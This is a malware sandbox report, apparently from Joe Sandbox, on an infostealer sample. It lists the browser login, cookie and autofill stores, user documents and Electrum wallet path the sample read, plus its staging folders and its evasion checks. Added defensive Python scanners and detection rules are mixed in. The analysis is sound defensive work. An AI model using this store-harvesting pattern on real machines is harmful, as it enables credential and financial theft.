              Source: Web Data.0.dr :: Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: Web Data.0.dr :: Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: Web Data.0.dr :: Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: Web Data.0.dr :: Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: Web Data.0.dr :: Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: Web Data.0.dr :: Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: Web Data.0.dr :: Binary or memory string: outlook.office365.comVMware20,11696428655t
              Source: Web Data.0.dr :: Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: cOQD62FceM.exe, 00000000.00000003.2603838350.00000190B8A93000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606122999.00000190B8A93000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: Web Data.0.dr :: Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: Web Data.0.dr :: Binary or memory string: outlook.office.comVMware20,11696428655s
              Source: Web Data.0.dr :: Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: Web Data.0.dr :: Binary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: Web Data.0.dr :: Binary or memory string: AMC password management pageVMware20,11696428655
              Source: Web Data.0.dr :: Binary or memory string: tasks.office.comVMware20,11696428655o
              Source: Web Data.0.dr :: Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: Web Data.0.dr :: Binary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: Web Data.0.dr :: Binary or memory string: interactivebrokers.comVMware20,11696428655
              Source: Web Data.0.dr :: Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: Web Data.0.dr :: Binary or memory string: dev.azure.comVMware20,11696428655j
              Source: Web Data.0.dr :: Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: Web Data.0.dr :: Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: Web Data.0.dr :: Binary or memory string: bankofamerica.comVMware20,11696428655x
              Source: Web Data.0.dr :: Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: Web Data.0.dr :: Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Process information queried: ProcessInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Process token adjusted: Debug
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: NtReadFile: Indirect: 0x7FF7478B52C7
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: NtWriteFile: Indirect: 0x7FF7478ADB77
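The two NtReadFile/NtWriteFile entries above are what Joe Sandbox reports as indirect syscalls: the transition to the kernel is issued from an address inside the sample's own image (0x7FF7...) rather than from ntdll.dll, which sidesteps the user-mode hooks an EDR places on ntdll exports. A cheap static check for the technique is to scan a module's executable sections for the x64 stub prologue `mov r10, rcx; mov eax, <SSN>` and classify each hit by whether the stub carries an inline `syscall` (direct) or ends in a `jmp` to a `syscall` gadget somewhere else (indirect). The Python below is an added example written for this page, not code from Joe Sandbox or from the sample: the opcode patterns are the standard x64 encodings, the SSN values 6 and 8 and the gadget address in the constructed byte string are illustrative (SSNs change between Windows builds), and the minimal PE wrapper exists only so the scanner can be exercised offline.

```python
"""Static triage for direct / indirect syscall stubs in x64 PE images.
Added example for this report; not Joe Sandbox's or the sample's code."""
import re
import struct
from dataclasses import dataclass

# x64 stub prologue shared by ntdll's Nt* exports and by the direct/indirect
# syscall tooling that copies them:  mov r10, rcx ; mov eax, <SSN>.
# SSNs fit in 16 bits, so the upper two bytes of the immediate are always zero.
STUB_PROLOGUE = re.compile(rb"\x4C\x8B\xD1\xB8(?P<ssn>[\x00-\xFF]{2})\x00\x00")
SYSCALL = b"\x0F\x05"                                # syscall
JMP_REG = re.compile(rb"(?:\x41)?\xFF[\xE0-\xE7]")    # jmp rax..rdi / r8..r15
JMP_RIPREL = b"\xFF\x25"                              # jmp qword ptr [rip+disp32]
WINDOW = 32            # bytes after the prologue within which the stub must finish


@dataclass
class Stub:
    offset: int
    ssn: int
    kind: str          # "direct" (inline syscall) or "indirect" (jmp to a gadget)


def find_syscall_stubs(code: bytes, window: int = WINDOW) -> list[Stub]:
    """Return every stub in `code`. A prologue followed by neither an inline
    syscall nor a jmp within `window` bytes is dropped as a likely false hit."""
    hits = []
    for m in STUB_PROLOGUE.finditer(code):
        tail = code[m.end():m.end() + window]
        if SYSCALL in tail:
            kind = "direct"
        elif JMP_REG.search(tail) or JMP_RIPREL in tail:
            kind = "indirect"
        else:
            continue
        hits.append(Stub(m.start(), int.from_bytes(m.group("ssn"), "little"), kind))
    return hits


def executable_sections(pe: bytes):
    """Yield (name, raw bytes) of each section with IMAGE_SCN_MEM_EXECUTE set."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file")
    pe_off = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsec = struct.unpack_from("<H", pe, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", pe, pe_off + 20)[0]
    sec_off = pe_off + 24 + opt_size          # section table follows the optional header
    for i in range(nsec):
        hdr = pe[sec_off + 40 * i:sec_off + 40 * (i + 1)]
        name = hdr[:8].rstrip(b"\0").decode(errors="replace")
        raw_size, raw_ptr = struct.unpack_from("<II", hdr, 16)
        chars = struct.unpack_from("<I", hdr, 36)[0]
        if chars & 0x20000000:                # IMAGE_SCN_MEM_EXECUTE
            yield name, pe[raw_ptr:raw_ptr + raw_size]


def scan_pe(pe: bytes) -> dict[str, list[Stub]]:
    """Map section name -> stubs found. Only meaningful for modules other than
    ntdll.dll, whose code section legitimately consists of these stubs."""
    return {name: stubs for name, data in executable_sections(pe)
            if (stubs := find_syscall_stubs(data))}


def build_minimal_pe(text: bytes) -> bytes:
    """Constructed, minimal PE wrapper with one executable .text section, used
    only to exercise scan_pe offline; it is not a loadable image."""
    pe_off, opt_size = 0x40, 0
    raw_ptr = pe_off + 24 + opt_size + 40     # right after the single section header
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", pe_off)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, opt_size, 0)
    sec = b".text\0\0\0" + struct.pack("<IIIIIIHHI", len(text), 0x1000, len(text),
                                        raw_ptr, 0, 0, 0, 0, 0x60000020)
    return dos + coff + sec + text


# Constructed sample bytes (not from the analysed file): an ntdll-style direct
# stub for SSN 6, a HellsGate-style indirect stub for SSN 8 that jumps to a
# made-up gadget address through r11, and a prologue-only false positive.
DIRECT_STUB = bytes.fromhex("4C8BD1 B806000000 F604250803FE7F01 7503 0F05 C3 CD2E C3".replace(" ", ""))
INDIRECT_STUB = bytes.fromhex("4C8BD1 B808000000 49BB78563412FE7F0000 41FFE3".replace(" ", ""))
FALSE_HIT = bytes.fromhex("4C8BD1 B82A000000 C3".replace(" ", ""))
SAMPLE_CODE = (b"\xCC" * 8 + DIRECT_STUB + b"\xCC" * 8 + INDIRECT_STUB
               + b"\xCC" * 8 + FALSE_HIT + b"\xCC" * 16)

if __name__ == "__main__":
    for section, stubs in scan_pe(build_minimal_pe(SAMPLE_CODE)).items():
        for s in stubs:
            print(f"{section}: {s.kind} syscall stub at +0x{s.offset:x}, SSN {s.ssn}")
```

Run scan_pe over any user-mode module except ntdll.dll; a hit in an executable's own .text is strong evidence of direct or indirect syscalls, and the recovered SSNs can be mapped back to Nt* names using the ntdll.dll of the same Windows build. Obfuscated tooling that computes the SSN at runtime instead of embedding it in `mov eax, imm32` will not match this prologue, so treat a clean scan as absence of evidence, not evidence of absence.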
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
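The process-creation entry above shows the sample spawning PowerShell non-interactively just to read the display name of the current culture (a locale check), and the volume-information entries that follow show the same process walking the Chrome, Edge and Firefox profile directories and then the user's Desktop and Documents. Both behaviours are straightforward to express as detection logic over process-creation and file-access telemetry. The Python below is an added example written for this page, not Joe Sandbox or vendor code: the event dictionaries use a constructed, simplified schema (not Sysmon's or any EDR's field names), the sample events are built from the paths and command line in this report, and the parent-path heuristic (PowerShell launched by a parent living under C:\Users\) is an assumption that needs tuning per environment.

```python
"""Detection logic over constructed endpoint telemetry for the behaviours in
this report. Added example; the event schema is an assumption, not a vendor's."""
import re
from collections import defaultdict

# Browser credential and cookie stores the sample enumerated. Local State is
# included on purpose: it holds the DPAPI-wrapped key that decrypts Chromium's
# Login Data and Cookies, so a stealer has to read it too.
STORE_RE = re.compile(
    r"\\(?:Google\\Chrome|Microsoft\\Edge)\\User Data\\"
    r"(?:Local State|[^\\]+\\(?:Login Data|Web Data|Network\\Cookies))$"
    r"|\\Mozilla\\Firefox\\Profiles\\[^\\]+\\cookies\.sqlite$",
    re.IGNORECASE,
)
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\[^\\]+\\", re.IGNORECASE)   # assumption: tune per estate
PS_FLAGS = ("-noprofile", "-noninteractive", "-command")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(events: list[dict]) -> list[dict]:
    """Return alerts for (a) powershell.exe launched non-interactively by a parent
    under a user profile and (b) non-browser processes reading browser stores,
    aggregated per process so one alert carries the whole list of stores."""
    alerts = []
    stores = defaultdict(set)
    for ev in events:
        if ev["type"] == "process_create" and basename(ev["image"]) == "powershell.exe":
            cmd = ev["command_line"].lower()
            if USER_WRITABLE.match(ev["parent_image"]) and all(f in cmd for f in PS_FLAGS):
                alerts.append({
                    "rule": "powershell_from_user_path",
                    "process": ev["parent_image"],
                    "detail": ev["command_line"],
                    "locale_recon": "get-culture" in cmd,
                })
        elif ev["type"] == "file_access" and basename(ev["image"]) not in BROWSERS:
            if STORE_RE.search(ev["target"]):
                stores[ev["image"]].add(ev["target"])
    for image, paths in stores.items():
        alerts.append({
            "rule": "browser_store_access",
            "process": image,
            "detail": sorted(paths),
            "browsers": sorted({b for b in ("Chrome", "Edge", "Firefox")
                                if any(b in p for p in paths)}),
        })
    return alerts


# Constructed sample events built from the paths and command line in this report.
SAMPLE = "C:\\Users\\user\\Desktop\\cOQD62FceM.exe"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
LOCAL = "C:\\Users\\user\\AppData\\Local\\"
CMDLINE = ('"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command '
           '"[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; '
           'Get-Culture | Select -ExpandProperty DisplayName"')
SAMPLE_EVENTS = [
    {"type": "process_create", "image": PS, "parent_image": SAMPLE, "command_line": CMDLINE},
    # benign: an interactive shell started from Explorer, parent is not user-writable
    {"type": "process_create", "image": PS, "parent_image": "C:\\Windows\\explorer.exe",
     "command_line": '"powershell.exe"'},
    {"type": "file_access", "image": SAMPLE, "target": LOCAL + "Google\\Chrome\\User Data\\Local State"},
    {"type": "file_access", "image": SAMPLE, "target": LOCAL + "Google\\Chrome\\User Data\\Default\\Login Data"},
    {"type": "file_access", "image": SAMPLE, "target": LOCAL + "Microsoft\\Edge\\User Data\\Default\\Network\\Cookies"},
    {"type": "file_access", "image": SAMPLE,
     "target": "C:\\Users\\user\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\v6zchhhv.default-release\\cookies.sqlite"},
    {"type": "file_access", "image": SAMPLE, "target": "C:\\Users\\user\\Desktop\\BJZFPPWAPT.docx"},  # not a store
    # the browser reading its own store is expected and ignored
    {"type": "file_access", "image": LOCAL + "Google\\Chrome\\Application\\chrome.exe",
     "target": LOCAL + "Google\\Chrome\\User Data\\Default\\Login Data"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

The per-process aggregation is the point: a single open of Login Data is noisy (backup agents, sync clients), but one non-browser process touching Local State plus Login Data or Cookies across several browsers in the same session is exactly the pattern this report documents, and the locale check via Get-Culture immediately before it is a useful corroborating signal.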
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\AppData\Local VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\AppData\Local\CEF\User Data VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.xlsx VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\cOQD62FceM.exe VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\DUUDTUBZFW.mp3 VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\DUUDTUBZFW.pdf VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\DUUDTUBZFW.xlsx VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\EEGWXUHVUG.docx VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\EFOYFBOLXA.docx VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\EFOYFBOLXA.pdf VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.pdf VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\EWZCVGNOWT.png VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\GLTYDMDUST.png VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\GRXZDKKVDB.docx VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\GRXZDKKVDB.jpg VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\HMPPSXQPQV.mp3 VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\KLIZUSIQEN.jpg VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\KLIZUSIQEN.mp3 VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\KLIZUSIQEN.pdf VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\NVWZAPQSQL.xlsx VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\NWCXBPIUYI.mp3 VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\NYMMPCEIMA.jpg VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.png VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\QCOILOQIKC.png VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.jpg VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.xlsx VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Documents VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Documents\BJZFPPWAPT.docx VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Documents\BJZFPPWAPT.jpg VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Documents\BJZFPPWAPT.xlsx VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Documents\desktop.ini VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Documents\DUUDTUBZFW.mp3 VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Documents\DUUDTUBZFW.pdf VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Documents\DUUDTUBZFW.xlsx VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Documents\EFOYFBOLXA.docx VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Documents\EFOYFBOLXA.xlsx VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Documents\EIVQSAOTAQ.pdf VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Documents\EWZCVGNOWT.png VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Documents\GLTYDMDUST.png VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Documents\GRXZDKKVDB.docx VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Documents\GRXZDKKVDB.pdf VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Documents\HMPPSXQPQV.mp3 VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Documents\KLIZUSIQEN.jpg VolumeInformation
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Queries volume information: C:\Users\user\Documents\KLIZUSIQEN.pdf VolumeInformation (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\NVWZAPQSQL.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\NVWZAPQSQL.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\NWCXBPIUYI.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\NYMMPCEIMA.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\PALRGUCVEH.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\PALRGUCVEH.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\QCOILOQIKC.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\QCOILOQIKC.png VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Autofill VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Cookies VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\CreditCards VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Downloads VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Passwords VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\screen1.png VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\sensitive-files.zip VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\user_info.txt VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Passwords\Chrome_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Passwords\Edge_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Passwords\Firefox_qnq0haq7.default.txt VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\History\Chrome_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\History\Edge_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\History\Firefox_qnq0haq7.default.txt VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Downloads\Chrome_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Downloads\Edge_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Downloads\Firefox_qnq0haq7.default.txt VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Cookies\Chrome_Default_Network.txt VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Cookies\Edge_Default_Network.txt VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Cookies\Firefox_qnq0haq7.default_Network.txt VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Autofill\Chrome_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Autofill\Edge_Default.txt VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Autofill\Firefox_qnq0haq7.default.txt VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\out.zip VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\cOQD62FceM.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: cOQD62FceM.exe, type: SAMPLE
Source: Yara match | File source: 0.0.cOQD62FceM.exe.7ff747670000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2016098986.00007FF747A80000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: cOQD62FceM.exe PID: 6176, type: MEMORYSTR
Source: cOQD62FceM.exe, 00000000.00000003.2537909337.00000190B8AEF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets\B
